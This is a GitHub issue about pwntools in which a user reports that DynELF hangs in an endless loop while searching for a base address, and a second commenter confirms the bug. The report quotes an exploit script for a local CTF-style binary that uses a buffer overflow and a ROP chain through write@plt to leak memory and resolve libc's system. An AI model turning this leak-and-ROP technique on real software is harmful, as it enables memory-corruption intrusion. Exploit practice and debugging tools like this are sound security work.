pwntools icon indicating copy to clipboard operation
pwntools copied to clipboard

Published 20 hours ago verified publisher icon Gallopsled

DynELF cannot break the endless loop in dynelf.py

Open Kiprey opened this issue 4 years ago • 1 comments

These are my codes:

from pwn import *
p = process("./pwn1_64")
e = ELF("pwn1_64")

plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b

def leak(address):
    payload1 = "a"*136
    payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
    payload1 += p64(plt_write_addr)
    payload1 += p64(start_addr)
    p.sendline(payload1)
    data = p.recv()
    return data

dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")

When I am executing this code,

dyn_elf = DynELF(leak, elf=e)

Program is stuck. So I try to debug and get into "dynelf.py", discovering that
in class DynELF -> function _find_base ,

def _find_base(self, ptr):
        page_size = 0x1000
        page_mask = ~(page_size - 1)

        ptr &= page_mask
        w = None

        while True:
            if self.leak.compare(ptr, '\x7fELF'):
                break

            # See if we can short circuit the search
            fast = self._find_base_optimized(ptr)
            if fast:
                ptr = fast
                continue

            ptr -= page_size

            if ptr < 0:
                raise ValueError("Address is negative, something is wrong!")

            # Defer creating the spinner in the event that 'ptr'
            # is already the base address
            w = w or self.waitfor("Finding base address")
            self.status('%#x' % ptr)

        # If we created a spinner, print the success message
        if w:
            self.success('%#x' % ptr)

        return ptr

The condition of breaking the loop has never be met.

I don't know why. But I found something interesting. When I was debugging, once I tried to run my Python script in console code by code. I mean, when one line of code was executed in python interpreter, I input the next line of code to the console and waiting the code to be executed, too.

When I input dyn_elf = DynELF(leak, elf=e) It ’s no surprise that the program was stuck. So, I input the ctrl + c to stop this code.

But when I input the same code to try again, the program didn't stuck at all! But it seems work very bad.

Here is the screeshot. image image

I don't know why ,too. But I hope this situation can help you. This is my pwn file. pwn1_64.zip I hope it can help you, too!

My English is a little poor, I hope it didn't disturb you.

Kiprey avatar Jan 29 '20 12:01 Kiprey

Similar to the above, I encountered a problem in which the dynelf function could not jump out of the loop and cause a memory leak, resulting in the POC process being killed by the system. My pwntools version is V4.5.0.

ioxera avatar May 27 '21 02:05 ioxera